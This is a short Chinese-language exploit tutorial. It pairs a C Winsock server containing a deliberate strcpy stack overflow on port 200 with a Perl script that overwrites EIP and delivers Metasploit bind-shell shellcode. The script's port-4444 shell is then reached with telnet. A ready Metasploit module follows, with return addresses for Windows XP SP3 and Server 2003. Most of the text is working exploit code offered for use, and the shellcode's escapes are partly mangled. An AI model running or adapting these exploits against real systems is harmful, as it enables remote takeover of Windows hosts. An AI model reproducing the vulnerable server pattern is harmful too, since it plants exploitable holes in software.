例子是:
#include <iostream.h>
#include <winsock.h>
#include <windows.h>
#include <stdio.h>
//load windows socket
#pragma comment(lib, "wsoc k32.lib")
//Define Return Messages
#define SS_ERROR 1
#define SS_OK 0
void pr( char *str)
{
char buf[500]="";
strcpy(buf,str);
}
void sError(char *str)
{
MessageBox (NULL, str, "socket Error" ,MB_OK);
WSACleanup();
}
int main(int argc, char **argv)
{
WORD sockVersion; WSADATA wsaData;
int rVal;
char Message[5000]="";
char buf[2000]="";
u_short LocalPort;
LocalPort = 200;
//wsock32 initialized for usage
sockVersion = MAKEWORD(1,1);
WSAStartup(sockVersion, &wsaData);
//create server socket
SOCKET serverSocket = socket(AF_INET, SOCK_STREAM, 0);
if(serverSocket == INVALID_SOCKET)
{
sError("Failed socket()");
return SS_ERROR;
}
SOCKADDR_IN sin;
sin.sin_family = PF_INET;
sin.sin_port = htons(LocalPort);
sin.sin_addr.s_addr = INADDR_ANY;
//bind the socket
rVal = bind(serverSocket, (LPSOCKADDR)&sin, sizeof(sin));
if(rVal == SOCKET_ERROR)
{
sError("Failed bind()");
WSACleanup();
return SS_ERROR;
}
//get socket to listen
rVal = listen(serverSocket, 10);
if(rVal == SOCKET_ERROR)
{
sError("Failed listen()");
WSACleanup();
return SS_ERROR;
}
//wait for a client to connect
SOCKET clientSocket;
clientSocket = accept(serverSocket, NULL, NULL);
if(clientSocket == INVALID_SOCKET)
{
sError("Failed accept()");
WSACleanup();
return SS_ERROR;
}
int bytesRecv = SOCKET_ERROR;
while( bytesRecv == SOCKET_ERROR )
{
//receive the data that is being sent by the client max limit to 5000 bytes.
bytesRecv = recv( clientSocket, Message, 5000, 0 );
if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET )
{
printf( "
Connection Closed.
");
break;
}
}
//Pass the data received to the function pr
pr(Message);
//close client socket
closesocket(clientSocket);
//close server socket
closesocket(serverSocket);
WSACleanup();
return SS_OK;
}
典型的EIP 覆盖问题················
perl SOCKET 代码:
在CMD 中 perl 1.pl 服务器IP 服务器端口
use strict; use Socket; my $junk = "x41"x504; my $eip = pack('V',0x769A1594);#0x769A1594 push esp - ret my $prejumk = "x90"x46; # windows/shell_bind_tcp - 368 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # LPORT=4444, RHOST=x.x.x.x, EXITFUNC=seh, my $shellcode = "x31xc9xdbxc3xd9x74x24xf4xb8xf3x9axbcx81x5b" . "xb1x56x31x43x16x03x43x16x83xc3xf7x78x49x7d" . "x1fxf5xb2x7exdfx66x3ax9bxeexb4x58xefx42x09" . "x2axbdx6exe2x7ex56xe5x86x56x59x4ex2cx81x54" . "x4fx80x0dx3ax93x82xf1x41xc7x64xcbx89x1ax64" . "x0cxf7xd4x34xc5x73x46xa9x62xc1x5axc8xa4x4d" . "xe2xb2xc1x92x96x08xcbxc2x06x06x83xfax2dx40" . "x34xfaxe2x92x08xb5x8fx61xfax44x59xb8x03x77" . "xa5x17x3axb7x28x69x7ax70xd2x1cx70x82x6fx27" . "x43xf8xabxa2x56x5ax38x14xb3x5axedxc3x30x50" . "x5ax87x1fx75x5dx44x14x81xd6x6bxfbx03xacx4f" . "xdfx48x77xf1x46x35xd6x0ex98x91x87xaaxd2x30" . "xdcxcdxb8x5cx11xe0x42x9dx3dx73x30xafxe2x2f" . "xdex83x6bxf6x19xe3x46x4exb5x1ax68xafx9fxd8" . "x3cxffxb7xc9x3cx94x47xf5xe9x3bx18x59x41xfc" . "xc8x19x31x94x02x96x6ex84x2cx7cx19x82xe2xa4" . "x4ax65x07x5bx7dx29x8exbdx17xc1xc6x16x8fx23" . "x3dxafx28x5bx17x83xe1xcbx2fxcdx35xf3xafxdb" . "x16x58x07x8cxecxb2x9cxadxf3x9exb4xa4xccx49" . "x4exd9x9fxe8x4fxf0x77x88xc2x9fx87xc7xfex37" . "xd0x80x31x4exb4x3cx6bxf8xaaxbcxedxc3x6ex1b" . "xcexcax6fxeex6axe9x7fx36x72xb5x2bxe6x25x63" . "x85x40x9cxc5x7fx1bx73x8cx17xdaxbfx0fx61xe3" . "x95xf9x8dx52x40xbcxb2x5bx04x48xcbx81xb4xb7" . "x06x02xcax46x9ax9fx5bxf1x4fxe2x01x02xbax21" . "x3cx81x4exdaxbbx99x3bxdfx80x1dxd0xadx99xcb" . "xd6x02x99xd9"; my $host = shift || 'localhost'; my $port = shift || 200; my $proto = getprotobyname('tcp'); my $iaddr = inet_aton($host); my $paddr = sockaddr_in($port,$iaddr); socket(SOCKET,AF_INET,SOCK_STREAM,$proto) or die "socket: $!"; print "[+] Connecting to $host on port $port "; connect(SOCKET,$paddr) or die "connect: $!"; print "[+] Sending payload"; print SOCKET $junk.$eip.$prejumk.$shellcode." "; print "[+] Payload sent "; close SOCKET or die "cose: $!";
执行完后
telnet 服务器IP 4444 即可得到shell
主要能看懂metasploit 就好了·········
C:Program FilesMetasploitFramework3msf3modulesexploitswindowsmisc 创建文件 xxx.rb
require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Custom vulnerable server stack overflow', 'Description' => %q{ This module exploits a stack overflow in a custom vulnerable server. }, 'Author' => [ 'Peter Van Eeckhoutte' ], 'Version' => '$Revision: 9999 $', 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 1400, 'BadChars' => "x00xff", }, 'Platform' => 'win', 'Targets' => [ ['Windows XP SP3 En', { 'Ret' => 0x7c874413, 'Offset' => 504 } ], ['Windows 2003 Server R2 SP2', { 'Ret' => 0x71c02b67, 'Offset' => 504 } ], ], 'DefaultTarget' => 0, 'Privileged' => false )) register_options( [ Opt::RPORT(200) ], self.class) end def exploit connect junk = make_nops(target['Offset']) sploit = junk + [target.ret].pack('V') + make_nops(50) + payload.encoded sock.put(sploit) handler disconnect end end